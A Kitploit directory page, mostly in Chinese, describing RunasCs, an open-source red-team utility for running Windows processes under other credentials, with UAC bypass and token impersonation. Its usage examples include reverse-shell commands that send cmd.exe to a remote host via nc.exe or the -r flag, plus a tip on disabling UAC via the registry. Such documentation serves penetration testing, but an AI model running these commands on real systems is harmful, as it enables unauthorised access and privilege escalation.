Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
RunasCs — RunasCs - Windows 内置 runas.exe 的 C# 开源版本 | Kitploit
工具/GitHubGitHub/antoniococo/runascs
权限提升冒充工具横向移动后渗透利用渗透测试红队
GitHubantoniococo/runascs

RunasCs

RunasCs - Windows 内置 runas.exe 的 C# 开源版本

查看仓库
1.4k161252年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

RunasCs


RunasCs 是一个实用程序,用于使用显式凭据以不同于用户当前登录所提供的权限来运行特定进程。 该工具是 Windows 内置 runas.exe 的改进开源版本,解决了以下一些限制:

  • 允许显式凭据
  • 无论是从交互式进程还是服务进程启动,都能正常工作
  • 在创建新进程时正确管理 Window Stations 和 Desktop 的 DACL
  • 如果调用进程拥有所需权限,则使用更可靠的创建进程函数,例如 CreateProcessAsUser() 和 CreateProcessWithTokenW()(自动检测)
  • 允许指定登录类型,例如 8-NetworkCleartext 登录(无 UAC 限制)
  • 当已知管理员密码时,允许绕过 UAC(标志 --bypass-uac)
  • 允许创建一个进程,其主线程模拟请求的用户(标志 --remote-impersonation)
  • 允许将 stdin、stdout 和 stderr 重定向到远程主机
  • 它是开源的 :)

RunasCs 具有自动检测功能,可为每个上下文确定最佳的创建进程函数。 根据进程调用方的令牌权限,它将按以下优先顺序使用其中一个创建进程函数:

  1. CreateProcessAsUserW()
  2. CreateProcessWithTokenW()
  3. CreateProcessWithLogonW()

要求


.NET Framework >= 2.0

用法


RunasCs v1.5 - @splinter_code

Usage:
    RunasCs.exe username password cmd [-d domain] [-f create_process_function] [-l logon_type] [-r host:port] [-t process_timeout] [--force-profile] [--bypass-uac] [--remote-impersonation]

Description:
    RunasCs is an utility to run specific processes under a different user account
    by specifying explicit credentials. In contrast to the default runas.exe command
    it supports different logon types and CreateProcess* functions to be used, depending
    on your current permissions. Furthermore it allows input/output redirection (even
    to remote hosts) and you can specify the password directly on the command line.

Positional arguments:
    username                username of the user
    password                password of the user
    cmd                     commandline for the process

Optional arguments:
    -d, --domain domain
                            domain of the user, if in a domain.
                            Default: ""
    -f, --function create_process_function
                            CreateProcess function to use. When not specified
                            RunasCs determines an appropriate CreateProcess
                            function automatically according to your privileges.
                            0 - CreateProcessAsUserW
                            1 - CreateProcessWithTokenW
                            2 - CreateProcessWithLogonW
    -l, --logon-type logon_type
                            the logon type for the token of the new process.
                            Default: "2" - Interactive
    -t, --timeout process_timeout
                            the waiting time (in ms) for the created process.
                            This will halt RunasCs until the spawned process
                            ends and sent the output back to the caller.
                            If you set 0 no output will be retrieved and a
                            background process will be created.
                            Default: "120000"
    -r, --remote host:port
                            redirect stdin, stdout and stderr to a remote host.
                            Using this option sets the process_timeout to 0.
    -p, --force-profile
                            force the creation of the user profile on the machine.
                            This will ensure the process will have the
                            environment variables correctly set.
                            WARNING: If non-existent, it creates the user profile
                            directory in the C:\Users folder.
    -b, --bypass-uac
                            try a UAC bypass to spawn a process without
                            token limitations (not filtered).
    -i, --remote-impersonation
                            spawn a new process and assign the token of the
                            logged on user to the main thread.

Examples:
    Run a command as a local user
        RunasCs.exe user1 password1 "cmd /c whoami /all"
    Run a command as a domain user and logon type as NetworkCleartext (8)
        RunasCs.exe user1 password1 "cmd /c whoami /all" -d domain -l 8
    Run a background process as a local user,
        RunasCs.exe user1 password1 "C:\tmp\nc.exe 10.10.10.10 4444 -e cmd.exe" -t 0
    Redirect stdin, stdout and stderr of the specified command to a remote host
        RunasCs.exe user1 password1 cmd.exe -r 10.10.10.10:4444
    Run a command simulating the /netonly flag of runas.exe
        RunasCs.exe user1 password1 "cmd /c whoami /all" -l 9
    Run a command as an Administrator bypassing UAC
        RunasCs.exe adm1 password1 "cmd /c whoami /priv" --bypass-uac
    Run a command as an Administrator through remote impersonation
        RunasCs.exe adm1 password1 "cmd /c echo admin > C:\Windows\admin" -l 8 --remote-impersonation

这两个进程(调用方和被调用方)将通过一个 管道(同时用于 stdout 和 stderr)进行通信。 默认登录类型为 2(交互式)。

默认情况下,交互式(2)登录类型受 UAC 限制,并且这些身份验证生成的令牌会被过滤。 你可以通过将以下注册表项设置为 0 并重新启动服务器,来使交互式登录不受任何限制:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA

否则,你可以尝试使用 --bypass-uac 标志来尝试绕过令牌过滤限制。

NetworkCleartext (8) 登录类型拥有最广泛的权限,因为它不会被 UAC 过滤本地令牌,并且仍然允许 通过网络进行身份验证,因为它将凭据存储在身份验证包中。如果你拥有足够的权限,请尝试始终通过 --logon-type 8 标志指定此登录类型。

默认情况下,调用进程(RunasCs)将等待所生成进程执行结束。 如果你需要生成后台或异步进程,例如生成反向 shell,则需要将参数 -t timeout 设置为 0。在这种情况下,RunasCs 不会等待新生成的进程执行结束。

参考资料


  • Potatoes 与令牌
  • 在 C++ 中启动交互式客户端进程
  • 创建具有重定向输入和输出的子进程
  • 交互式服务
  • "The application failed to initialize properly (0xc0000142)" 错误是怎么回事?
  • 获取交互式服务账户 Shell
  • 深入了解 UAC(第 1 部分)
  • 深入了解 UAC(第 2 部分)
  • 深入了解 UAC(第 3 部分)
  • Vanara - 一组用于 Windows 的 .NET 库,实现对许多原生 Windows API 的 PInvoke 调用并提供支持的包装器

致谢


  • @decoder
  • @qtc-de
  • @winlogon0
下载工具